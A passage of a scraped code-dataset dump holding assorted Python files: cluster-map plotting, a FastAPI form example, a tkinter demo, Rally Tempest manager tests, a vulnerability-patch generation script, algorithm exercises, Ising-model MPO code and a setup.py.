\"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"1类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第1类分布.html\")\n )\n\n\ndef category_2():\n category = df.loc[df['类别'] == 2]\n # print(category)\n category2 = category.groupby(['所在区市']).count()['单价']\n x = category2.index.tolist()\n y = category2.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category2)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"2类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第2类分布.html\")\n )\n\n\ndef category_3():\n category = df.loc[df['类别'] == 3]\n # print(category)\n category3 = category.groupby(['所在区市']).count()['单价']\n x = category3.index.tolist()\n y = category3.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category3)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"3类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第3类分布.html\")\n )\n\n\nif __name__ == '__main__':\n category_0()\n category_1()\n category_2()\n category_3()\n","repo_name":"JDKwillim/python-lianjia","sub_path":"data_any/kmean_analysis.py","file_name":"kmean_analysis.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"18935011070","text":"\nfrom fastapi import FastAPI\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.requests import Request\nfrom pydantic_forms import PydanticForm\nfrom pydantic import BaseModel\n\ntemplates = Jinja2Templates(directory=\"my/template/directory\")\napp = FastAPI()\n\nclass MyForm(BaseModel):\n name: str\n age: int\n\n@app.get('/my_form', response_class=HTMLResponse)\nasync def get_my_form(request: Request):\n form = await PydanticForm.create(request, MyForm)\n return templates.TemplateResponse(\"myform.html\", {\"request\": request, 'form': form})\n\n@app.post('/my_form', response_class=HTMLResponse)\nasync def handle_my_form(request: Request):\n form = await PydanticForm.validate_request(request, MyForm)\n if form.is_valid:\n model = form.model\n return f\"Hello {model.name} you are {model.age} years old\"\n else:\n return templates.TemplateResponse(\"myform.html\", {\"request\": request, 'form': form})\n\n","repo_name":"dfitzpatrick/pydantic-forms","sub_path":"docs/source/fastapi_example.py","file_name":"fastapi_example.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"25745114763","text":"import tkinter as tk\n\n\nclass HelloWorldApplicationV2(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.stateWindow = None\n self.switchState(1)\n self.pack()\n\n # State 1: Welcome screen. State 2: Home screen\n def switchState(self, state):\n self.stateWindow.destroy() if self.stateWindow is not None else None\n\n if state == 1:\n self.stateWindow = WelcomeScreen(self)\n elif state == 2:\n self.stateWindow = HomeScreen(self)\n\n self.stateWindow.pack()\n\n\n\n\n\nclass WelcomeScreen(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n\n self.label = tk.Label(self, text=\"Welcome to Hello World Application!\")\n self.button = tk.Button(self, text='Click to enter application', command = lambda: self.master.switchState(2) )\n self.label.pack()\n self.button.pack()\n\n\nclass HomeScreen(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n\n self.label = tk.Label(self, text=\"Press Button Below for Hello World!\", fg='Red')\n self.button = tk.Button(self, text=\"Hello!\", command=HomeScreen.printHello )\n self.exit = tk.Button(self, text='Exit', command=root.quit)\n\n self.label.pack()\n self.button.pack()\n self.exit.pack()\n\n @staticmethod\n def printHello():\n print(\"Hello From Tkinter!\")\n\n\n\n\nroot = tk.Tk()\nmain = HelloWorldApplicationV2(root)\nmain.mainloop()\n","repo_name":"AdmiJW/Python","sub_path":"Topics/GUI with Tkinter/1.1-Hello_World_V2.py","file_name":"1.1-Hello_World_V2.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3022270430","text":"# -*- coding:utf-8 -*-\n\nimport unittest\nfrom phystats.repeat_timer import RepeatTimer\nfrom phystats.kafkah.kafka_helper import KafkaHelper\n\n\nclass TestKafkaConsume(unittest.TestCase):\n def test_consume_msgs(self):\n topic = \"phystats\"\n host = 'localhost'\n port = 9092\n kafka_helper = KafkaHelper(topic=topic, host=host, port=port)\n msgs = kafka_helper.consume_data(topic=None, boot_server=None, limit=None)\n print(len(msgs))\n\n\nif __name__ == '__main__':\n test = TestKafkaConsume()\n test.test_consume_msgs()","repo_name":"byuegv/phystats","sub_path":"test/test_kafka_consumer.py","file_name":"test_kafka_consumer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74898836996","text":"import subprocess\nimport sys\nimport os\nimport traceback\nfrom pathlib import Path\n\n\ndef main(argv):\n buggy_file_lines = open(argv[0], \"r\").readlines()\n buggy_line_number = int(argv[1])\n buggy_line = buggy_file_lines[buggy_line_number-1]\n predictions = open(argv[2], \"r\").readlines()\n reco_lines = open(argv[3], \"r\").readlines()\n starting_pred_pos = int(argv[5])\n if len(reco_lines) > 0:\n recover_line = reco_lines[0]\n recovers = recover_line.split(\";\")\n else:\n recovers = []\n\n recover_dic = {}\n str_list = []\n if len(recovers) != 0:\n for recover in recovers:\n tokens = recover.split(\"->\")\n if len(tokens) == 2:\n if tokens[1] != \"str\":\n recover_dic[tokens[1]] = tokens[0]\n else:\n str_list.append(tokens[0])\n predictions_recover = []\n for predict in predictions:\n tokens = predict.split(\" \")\n recover_line = \"\"\n str_num = 1\n count = 0\n for token in tokens:\n if token in recover_dic.keys():\n token = recover_dic[token]\n elif token == \"str\":\n if str_num <= len(str_list):\n token = str_list[str_num-1]\n str_num += 1\n else:\n str_num += 1\n if count + 1 < len(tokens) and tokens[count + 1] == \"=\" and count - 1 >= 0 and tokens[count - 1] != \".\":\n recover_line += \" \" + token\n elif token == \"private\" or token == \"static\" or token == \"final\":\n recover_line += token + \" \"\n else:\n recover_line += token\n count += 1\n predictions_recover.append(recover_line)\n white_space_before_buggy_line = buggy_line[0:buggy_line.find(buggy_line.lstrip())]\n for i in range(starting_pred_pos, starting_pred_pos + 10):\n output_file = os.path.join(argv[4], str(i+1), os.path.basename(argv[0]))\n os.makedirs(os.path.dirname(output_file))\n output_file = open(output_file, \"w\")\n for j in range(len(buggy_file_lines)):\n if(j+1 == buggy_line_number):\n last_char = buggy_file_lines[j].rstrip()[-1]\n if predictions_recover[i][-1] != last_char:\n output_file.write(white_space_before_buggy_line + predictions_recover[i].rstrip()+last_char+\"\\n\")\n else:\n output_file.write(white_space_before_buggy_line + predictions_recover[i])\n else:\n output_file.write(buggy_file_lines[j])\n output_file.close()\n\n\nif __name__ == \"__main__\":\n start_id = \"VUL4J-1\"\n cont = True\n for i in range(1, 80):\n vul_id = \"VUL4J-\" + str(i)\n if vul_id != start_id:\n if cont:\n continue\n else:\n cont = False\n\n root_path = \"./vul4j/\" + vul_id + \"/\"\n\n for file in os.listdir(root_path):\n vul_case_path = root_path + \"/\" + file + \"/\"\n\n if os.path.isdir(vul_case_path)\\\n and file != \"patch\" and file != \"generated_patch\" \\\n and \"_\" in file:\n\n generated_patch_path = vul_case_path + \"/generated_patch\"\n Path(generated_patch_path).mkdir(parents=False, exist_ok=True)\n\n count1 = 0\n with open(vul_case_path + \"src-num.txt\", \"r\") as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip()\n vul_file_path = line.split(\";\")[0]\n vulnerable_line = line.split(\";\")[1].split(\",\")[0]\n\n try:\n main([vul_file_path,\n vulnerable_line,\n vul_case_path + \"pred_simu.txt\",\n vul_case_path + \"recover.txt\",\n generated_patch_path,\n str(count1 * 10)])\n\n vul_file_name = vul_file_path.split(\"/\")[-1]\n\n for file2 in os.listdir(generated_patch_path):\n subprocess.call(f\"diff --strip-trailing-cr {vul_file_path} {generated_patch_path}/{file2}/{vul_file_name} > {generated_patch_path}/{file2}/patch.diff\",\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n except Exception as e:\n print(\"\", end=\"\")\n\n count1 += 1","repo_name":"tuhh-softsec/APR4Vul","sub_path":"experiments/SeqTrans/patch_generation.py","file_name":"patch_generation.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"38580417481","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport os\nimport subprocess\nfrom unittest import mock\n\nfrom rally import exceptions\n\nfrom rally_openstack.verification.tempest import manager\nfrom tests.unit import test\n\n\nPATH = \"rally_openstack.verification.tempest.manager\"\n\n\nclass TempestManagerTestCase(test.TestCase):\n\n def test_run_environ_property(self):\n mock.patch(\"%s.testr.TestrLauncher.run_environ\" % PATH,\n new={\"some\": \"key\"}).start()\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n env = {\"some\": \"key\",\n \"OS_TEST_PATH\": os.path.join(tempest.repo_dir,\n \"tempest/test_discover\"),\n \"TEMPEST_CONFIG\": \"tempest.conf\",\n \"TEMPEST_CONFIG_DIR\": os.path.dirname(tempest.configfile)}\n\n self.assertEqual(env, tempest.run_environ)\n\n def test_configfile_property(self):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n self.assertEqual(os.path.join(tempest.home_dir, \"tempest.conf\"),\n tempest.configfile)\n\n @mock.patch(\"%s.open\" % PATH, side_effect=mock.mock_open())\n def test_get_configuration(self, mock_open):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n tempest.get_configuration()\n\n mock_open.assert_called_once_with(tempest.configfile)\n mock_open.side_effect().read.assert_called_once_with()\n\n @mock.patch(\"%s.config.TempestConfigfileManager\" % PATH)\n def test_configure(self, mock_tempest_configfile_manager):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n cm = mock_tempest_configfile_manager.return_value\n extra_options = mock.Mock()\n\n self.assertEqual(cm.create.return_value,\n tempest.configure(extra_options))\n mock_tempest_configfile_manager.assert_called_once_with(\n tempest.verifier.env)\n cm.create.assert_called_once_with(tempest.configfile, extra_options)\n\n @mock.patch(\"%s.config.os.path.exists\" % PATH)\n def test_is_configured(self, mock_exists):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n self.assertTrue(tempest.is_configured())\n\n @mock.patch(\"rally.verification.utils.extend_configfile\")\n def test_extend_configuration(self, mock_extend_configfile):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n extra_options = mock.Mock()\n self.assertEqual(mock_extend_configfile.return_value,\n tempest.extend_configuration(extra_options))\n mock_extend_configfile.assert_called_once_with(extra_options,\n tempest.configfile)\n\n @mock.patch(\"%s.open\" % PATH, side_effect=mock.mock_open())\n def test_override_configuration(self, mock_open):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n new_content = mock.Mock()\n\n tempest.override_configuration(new_content)\n\n mock_open.assert_called_once_with(tempest.configfile, \"w\")\n mock_open.side_effect().write.assert_called_once_with(new_content)\n\n @mock.patch(\"%s.os.path.exists\" % PATH)\n @mock.patch(\"%s.utils.check_output\" % PATH)\n @mock.patch(\"%s.TempestManager.check_system_wide\" % PATH)\n def test_install_extension(self, mock_check_system_wide, mock_check_output,\n mock_exists):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\",\n system_wide=True))\n e = self.assertRaises(NotImplementedError, tempest.install_extension,\n None, None, {\"key\": \"value\"})\n self.assertIn(\"verifiers don't support extra installation settings\",\n \"%s\" % e)\n\n test_reqs_path = os.path.join(tempest.base_dir, \"extensions\",\n \"example\", \"test-requirements.txt\")\n\n # case #1 system-wide installation\n source = \"https://github.com/example/example\"\n tempest.install_extension(source)\n\n path = os.path.join(tempest.base_dir, \"extensions\")\n mock_check_output.assert_called_once_with(\n [\"pip\", \"install\", \"--no-deps\", \"--src\", path, \"-e\",\n \"git+https://github.com/example/example@master#egg=example\"],\n cwd=tempest.base_dir, env=tempest.environ)\n mock_check_system_wide.assert_called_once_with(\n reqs_file_path=test_reqs_path)\n\n mock_check_output.reset_mock()\n\n # case #2 virtual env with specified version\n tempest.verifier.system_wide = False\n version = \"some\"\n tempest.install_extension(source, version=version)\n\n self.assertEqual([\n mock.call([\n \"pip\", \"install\", \"--src\", path, \"-e\",\n \"git+https://github.com/example/example@some#egg=example\"],\n cwd=tempest.base_dir, env=tempest.environ),\n mock.call([\"pip\", \"install\", \"-r\", test_reqs_path],\n cwd=tempest.base_dir, env=tempest.environ)],\n mock_check_output.call_args_list)\n\n @mock.patch(\"%s.utils.check_output\" % PATH)\n def test_list_extensions(self, mock_check_output):\n plugins_list = [\n {\"name\": \"some\", \"entry_point\": \"foo.bar\", \"location\": \"/tmp\"},\n {\"name\": \"another\", \"entry_point\": \"bar.foo\", \"location\": \"/tmp\"}\n ]\n mock_check_output.return_value = json.dumps(plugins_list)\n\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n self.assertEqual(plugins_list, tempest.list_extensions())\n self.assertEqual(1, mock_check_output.call_count)\n mock_check_output.reset_mock()\n\n mock_check_output.side_effect = subprocess.CalledProcessError(\"\", \"\")\n self.assertRaises(exceptions.RallyException, tempest.list_extensions)\n self.assertEqual(1, mock_check_output.call_count)\n\n @mock.patch(\"%s.TempestManager.list_extensions\" % PATH)\n @mock.patch(\"%s.os.path.exists\" % PATH)\n @mock.patch(\"%s.shutil.rmtree\" % PATH)\n def test_uninstall_extension(self, mock_rmtree, mock_exists,\n mock_list_extensions):\n plugins_list = [\n {\"name\": \"some\", \"entry_point\": \"foo.bar\", \"location\": \"/tmp\"},\n {\"name\": \"another\", \"entry_point\": \"bar.foo\", \"location\": \"/tmp\"}\n ]\n mock_list_extensions.return_value = plugins_list\n\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n tempest.uninstall_extension(\"some\")\n mock_rmtree.assert_called_once_with(plugins_list[0][\"location\"])\n mock_list_extensions.assert_called_once_with()\n\n mock_rmtree.reset_mock()\n mock_list_extensions.reset_mock()\n\n self.assertRaises(exceptions.RallyException,\n tempest.uninstall_extension, \"unexist\")\n\n mock_list_extensions.assert_called_once_with()\n self.assertFalse(mock_rmtree.called)\n\n @mock.patch(\"%s.TempestManager._transform_pattern\" % PATH)\n @mock.patch(\"%s.testr.TestrLauncher.list_tests\" % PATH)\n def test_list_tests(self, mock_testr_launcher_list_tests,\n mock__transform_pattern):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n self.assertEqual(mock_testr_launcher_list_tests.return_value,\n tempest.list_tests())\n mock_testr_launcher_list_tests.assert_called_once_with(\"\")\n self.assertFalse(mock__transform_pattern.called)\n mock_testr_launcher_list_tests.reset_mock()\n\n pattern = mock.Mock()\n\n self.assertEqual(mock_testr_launcher_list_tests.return_value,\n tempest.list_tests(pattern))\n mock_testr_launcher_list_tests.assert_called_once_with(\n mock__transform_pattern.return_value)\n mock__transform_pattern.assert_called_once_with(pattern)\n\n @mock.patch(\"%s.testr.TestrLauncher.validate_args\" % PATH)\n def test_validate_args(self, mock_testr_launcher_validate_args):\n tm = manager.TempestManager(mock.Mock())\n tm.validate_args({})\n tm.validate_args({\"pattern\": \"some.test\"})\n tm.validate_args({\"pattern\": \"set=smoke\"})\n tm.validate_args({\"pattern\": \"set=compute\"})\n tm.validate_args({\"pattern\": \"set=full\"})\n\n e = self.assertRaises(exceptions.ValidationError, tm.validate_args,\n {\"pattern\": \"foo=bar\"})\n self.assertEqual(\"Validation error: 'pattern' argument should be a \"\n \"regexp or set name (format: 'tempest.api.identity.\"\n \"v3', 'set=smoke').\", \"%s\" % e)\n\n e = self.assertRaises(exceptions.ValidationError, tm.validate_args,\n {\"pattern\": \"set=foo\"})\n self.assertIn(\"Test set 'foo' not found in available Tempest test \"\n \"sets. Available sets are \", \"%s\" % e)\n\n def test__transform_pattern(self):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n self.assertEqual(\"foo\", tempest._transform_pattern(\"foo\"))\n self.assertEqual(\"foo=bar\", tempest._transform_pattern(\"foo=bar\"))\n self.assertEqual(\"\", tempest._transform_pattern(\"set=full\"))\n self.assertEqual(\"smoke\", tempest._transform_pattern(\"set=smoke\"))\n self.assertEqual(\"tempest.bar\", tempest._transform_pattern(\"set=bar\"))\n self.assertEqual(\"tempest.api.compute\",\n tempest._transform_pattern(\"set=compute\"))\n\n @mock.patch(\"%s.TempestManager._transform_pattern\" % PATH)\n def test_prepare_run_args(self, mock__transform_pattern):\n tempest = manager.TempestManager(mock.MagicMock(uuid=\"uuuiiiddd\"))\n\n self.assertEqual({}, tempest.prepare_run_args({}))\n self.assertFalse(mock__transform_pattern.called)\n\n self.assertEqual({\"foo\": \"bar\"},\n tempest.prepare_run_args({\"foo\": \"bar\"}))\n self.assertFalse(mock__transform_pattern.called)\n\n pattern = mock.Mock()\n self.assertEqual({\"pattern\": mock__transform_pattern.return_value},\n tempest.prepare_run_args({\"pattern\": pattern}))\n mock__transform_pattern.assert_called_once_with(pattern)\n","repo_name":"openstack/rally-openstack","sub_path":"tests/unit/verification/tempest/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"62"} +{"seq_id":"72394477317","text":"def find_root(x):\n if roots[x] == x:\n return x\n else:\n return find_root(roots[x])\n\ndef union(x, y):\n if x < y:\n roots[y] = x\n # 아래 for문 돌리는 건 그룹 찾을 때만! 지금은 필요 없다.\n else:\n roots[x] = y\n\nV, E = map(int, input().split())\nroots = [i for i in range(V+1)] # make set\ndata = []\nfor _ in range(E):\n data.append(list(map(int, input().split())))\ndata.sort(key=lambda x:x[2])\n\nans = 0\nfor a, b, c in data:\n a_root = find_root(a)\n b_root = find_root(b)\n if a_root != b_root:\n union(a_root, b_root)\n ans += c\nprint(ans)","repo_name":"hyunspace/TIL-APS","sub_path":"백준/골드4/1197_최소스피닝트리0407.py","file_name":"1197_최소스피닝트리0407.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"15290082590","text":"# 실습문제 2.4.1\n# 리스트 내포를 사용해서 word_list에 들어 있는 문자열 중 첫 글자가 a인 것만 뽑아서 리스트로 만드세요\n# 변경전 \n\nword_list = [\"apple\", \"watch\", \"apolo\", \"star\", \"abocado\"]\n# 리스트 내포 사용하기 전\nlist = []\nfor str in word_list:\n if str[0] == 'a':\n list.append(str)\nprint(list)\n\n# 리스트 내포 사용 후\nlist2 = [str for str in word_list if str[0] == 'a']\nprint(list2)","repo_name":"devsj87/python_advanced","sub_path":"myvenv/Chapter02/05.실습문제.2.4.1.py","file_name":"05.실습문제.2.4.1.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"6459275435","text":"import numpy as np\n\nH, W, N = map(int, input().split())\n\nAB = [map(int, input().split()) for _ in range(N)]\nA, B = [list(i) for i in zip(*AB)]\n\n# H行W列の2次元配列を0で初期化\nABlist = np.zeros((H, W))\n\n# 存在するカードの代入\nfor i in range(N):\n ABlist[A[i] - 1][B[i] - 1] = i + 1\n\n\"\"\"先頭からの削除では範囲外参照を起こすため,末尾からの削除で実装\"\"\"\n# カードが存在しない行の削除\nfor h in range(H - 1, -1, -1):\n if all([x == 0 for x in ABlist[h, :]]):\n ABlist = np.delete(ABlist, h, 0)\n\n# カードが存在しない列の削除\nfor w in range(W - 1, -1, -1):\n if all([y == 0 for y in ABlist[:, w]]):\n ABlist = np.delete(ABlist, w, 1)\n\n# 残ったカードのインデックス検知\nresult = []\nfor i in range(len(ABlist[0, :])):\n for j in range(len(ABlist[:, 0])):\n for x in range(len(ABlist[0, :]) * len(ABlist[:, 0])):\n if ABlist[i][j] == (x + 1):\n result.insert((x), [i + 1, j + 1])\n\nfor card in result:\n print(card[0], card[1])","repo_name":"halpi17/AtCoder","sub_path":"BeginnerContest213/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"29755856272","text":"# Last modified: 2022/09/14 17:27:43\n\nfrom math import sin, cos, sinh, cosh, sqrt\n\nimport numpy as np\nfrom scipy import linalg as LA\nfrom tensornetwork import ncon\nimport logging\n\nsx = np.array([[0.,1.],[1.,0.]])\nsz = np.array([[1.,0.],[0.,-1.]])\nid = np.eye(2)\nzero = np.zeros([2,2])\n\ndef IsingMPO(LL: int, J: float = 1., g: float = 0.4) -> list[np.array]:\n\n \"\"\" Ising Hamiltonian in MPO form \"\"\"\n\n Wmpo = [id]*LL\n \n # I put a minus in front of this to get the correct Ising Ham with an overall minus,\n # alternatively one could just define the couplings as negative I guess\n # |\n # v\n \n Wmpo[0] = - np.array([[g*sx, J*sz, id]])\n\n for j in range(1,LL-1):\n Wmpo[j] = np.array([[id, zero, zero],\n [sz, zero, zero], \n [g*sx, J*sz, id ]])\n \n Wmpo[LL-1] = np.array([[id],[sz],[g*sx]]) \n\n\n # nel mio MPO parto dalla dx e vado verso sx, vs. Luca che va da sx a dx \n #\n # |0><0| x 1 + 10 x Z -h 20 x X + h \n\n\n logging.info(f\"Ising MPO, parameters: J={J} g={g}, shapes:\")\n logging.info([np.shape(w) for w in Wmpo])\n\n print(Wmpo[0])\n \n return Wmpo\n\n\ndef IsingMPO_swapLR(LL: int, J: float = 1., g: float = 0.4) -> list[np.array]:\n\n \"\"\" Ising Hamiltonian in MPO form \"\"\"\n\n Wmpo = [id]*LL\n \n # I put a minus in front of this to get the correct Ising Ham with an overall minus,\n # alternatively one could just define the couplings as negative I guess\n # |\n # v\n \n Wmpo[0] = - np.array([[g*sx, J*sz, id]])\n\n for j in range(1,LL-1):\n Wmpo[j] = np.array([[id, zero, zero],\n [sz, zero, zero], \n [g*sx, J*sz, id ]])\n \n Wmpo[LL-1] = np.array([[id],[sz],[g*sx]]) \n\n\n # nel mio MPO parto dalla dx e vado verso sx, vs. Luca che va da sx a dx \n #\n # |0><0| x 1 + 10 x Z -h 20 x X + h \n\n\n logging.info(f\"Ising MPO, parameters: J={J} g={g}, shapes:\")\n logging.info([np.shape(w) for w in Wmpo])\n\n print(Wmpo[0])\n\n for i,wi in enumerate(Wmpo):\n Wmpo[i] = wi.transpose(0,1,3,2)\n \n return Wmpo\n\n\n\n\n\ndef OneMinusEpsHIsingMPO(LL: int, J: float = 1., g: float = 0.4, eps: float = 0.1) -> list[np.array]:\n \"\"\" 1 - eps*H in MPO form, should be seen as a first approx to exp(-eps*H) \"\"\"\n\n Wmpo = [id]*LL\n \n Wmpo[0] = np.array([[id + eps*g*sx, +eps*J*sz, +eps*id]])\n\n for j in range(1,LL-1):\n Wmpo[j] = np.array([[id, zero, zero],\n [sz, zero, zero], \n [g*sx, J*sz, id ]])\n \n Wmpo[LL-1] = np.array([[id],[sz],[g*sx]]) \n\n\n # nel mio MPO parto dalla dx e vado verso sx, vs. Luca che va da sx a dx \n #\n # |0><0| x 1 + 10 x Z -h 20 x X + h \n\n\n logging.info(f\"Ising MPO, parameters: J={J} g={g}, shapes:\")\n logging.info([np.shape(w) for w in Wmpo])\n \n return Wmpo\n \n\n\ndef expMinusEpsHIsingMPO(LL: int, J: float = 1., g: float = 0.4, eps: float = 0.1, mode=\"svd\") -> list[np.array]:\n \n \"\"\" Exp(-tau*Hising) in MPO form, \n using second-order Trotter, build with SVD \"\"\"\n\n if mode == \"svd\":\n Ut =np.reshape(LA.expm(eps*np.kron(sz,sz)),(2,2,2,2))\n \n u, s, v = LA.svd( np.reshape(np.transpose(Ut,(0,2,1,3)),(4,4)) )\n # only 2 of the 4 SVs are nonzero, so we can truncate \n #vss = LA.sqrtm(np.diag(s)) @ v;\n vss = LA.sqrtm(np.diag(s[:2])) @ v[:2,:]\n #ssu = u @ LA.sqrtm(np.diag(s));\n ssu = u[:,:2] @ LA.sqrtm(np.diag(s[:2]))\n\n MPO = ncon([np.reshape(ssu,(2,2,2)),np.reshape(vss,(2,2,2))],[[-3,1,-2],[-1,1,-4]]) \n WW = ncon([LA.expm(eps*g*0.5*sx), MPO, LA.expm(eps*g*0.5*sx)],[[-3,1],[-1,-2,1,2],[2,-4]])\n \n elif mode == \"sin\":\n \n print(\"Using sinh/cosh decomposition (symmetric form)\")\n m11= cosh(eps)*LA.expm(g*sz*eps)\n #m11= cosh(eps)*LA.expm(-g*sz*eps)\n\n #m12=1j*sqrt(sinh(eps)*cosh(eps))*LA.expm(-g*sz*eps/2.)*sx*LA.expm(-g*sz*eps/2.)\n m12=1j*sqrt(sinh(eps)*cosh(eps))*LA.expm(g*sz*eps/2.)*sx*LA.expm(g*sz*eps/2.)\n m21= m12 \n #m22=-sinh(eps)*LA.expm(-g*sz*eps)\n m22=-sinh(eps)*LA.expm(g*sz*eps)\n \n WW = np.asarray([[ m11, m12],[m21, m22]])\n \n\n # Fill the MPO matrices\n Wmpo = [WW]* LL\n \n #For the edges \n # First column: WW[0:2,0,:,:]\n # First row: WW[0,0:2,:,:]\n \n # Wmpo[0] = WW[0:2,0,:,:].reshape(1,2,2,2)\n # Wmpo[LL-1] = WW[0,0:2,:,:].reshape(2,1,2,2)\n \n Wmpo[0] = WW[0,0:2,:,:].reshape(1,2,2,2)\n Wmpo[LL-1] = WW[0:2,0,:,:].reshape(2,1,2,2)\n return Wmpo\n ","repo_name":"starsfordummies/dummyrg","sub_path":"code/stefanoMPS/myIsingMPO.py","file_name":"myIsingMPO.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"1580696737","text":"def beautiful(lis):\n dic = {}\n lis = lis.upper()\n for i in lis:\n if i in dic:\n dic[i] = dic[i] + 1\n else:\n dic[i] = 1\n val = list(dic.values())\n val.sort(reverse=True)\n weight = list(range(1, 27))\n weight.sort(reverse=True)\n sum1 = 0\n for i, j in zip(val, weight):\n sum1 = sum1 + i * j\n return sum1\n\n\ndef beautiful_lis(s_lis):\n a = []\n for i in s_lis:\n a.append(beautiful(i))\n return a\n\n\nwhile True:\n try:\n n = int(input())\n name_lis = []\n # name_lis=[\"zhangsan\",\"lisi\"]\n for i in range(n):\n name_lis.append(input())\n\n val = beautiful_lis(name_lis)\n for i in val:\n print(i)\n except:\n break","repo_name":"moguoyi/httpApi","sub_path":"huaweiTest/name_list.py","file_name":"name_list.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7170600199","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport shlex\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test\n\n\nclass RunTest(test):\n pytest_args = ''\n mypy_args = list()\n\n def initialize_options(self):\n test.initialize_options(self)\n self.mypy_args = ['utilspy']\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n import mypy.api\n\n color_red = '\\x1b[31;1m'\n color_green = '\\x1b[32;1m'\n color_default = '\\x1b[0m'\n exit_ok = 0\n\n err_no = pytest.main(shlex.split(self.pytest_args))\n if err_no != exit_ok:\n sys.exit(err_no)\n\n print(\">>> Running mypy\")\n stdout, _, status = mypy.api.run(args=self.mypy_args)\n if status:\n raise SystemExit(\"{color_red}ERROR!\\n {color_default}{msg}\".format(\n color_red=color_red, color_default=color_default, msg=stdout))\n\n print(\"{color}All good{default}\".format(color=color_green, default=color_default))\n sys.exit(exit_ok)\n\n\nhere = os.path.realpath(os.path.dirname(__file__))\nreq_dir = os.path.join(here, 'requirements')\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith((\"#\", \"--\"))]\n\n\nrequirements = parse_requirements(os.path.join(req_dir, 'main.txt'))\ntest_requirements = parse_requirements(os.path.join(req_dir, 'test.txt'))\n\nversion_file = open(os.path.join(here, 'VERSION'))\nversion = version_file.read().strip()\n\nsetup(\n name='utilspy',\n version=version,\n description='Generic code for python',\n long_description='',\n classifiers=[\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n ],\n author='Naoko Reeves',\n author_email='',\n \n url='https://github.com/naoko/utilspy.git',\n packages=find_packages(exclude=('tests*',)),\n include_package_data=True,\n zip_safe=False,\n install_requires=requirements,\n tests_require=test_requirements,\n cmdclass={\n 'test': RunTest,\n 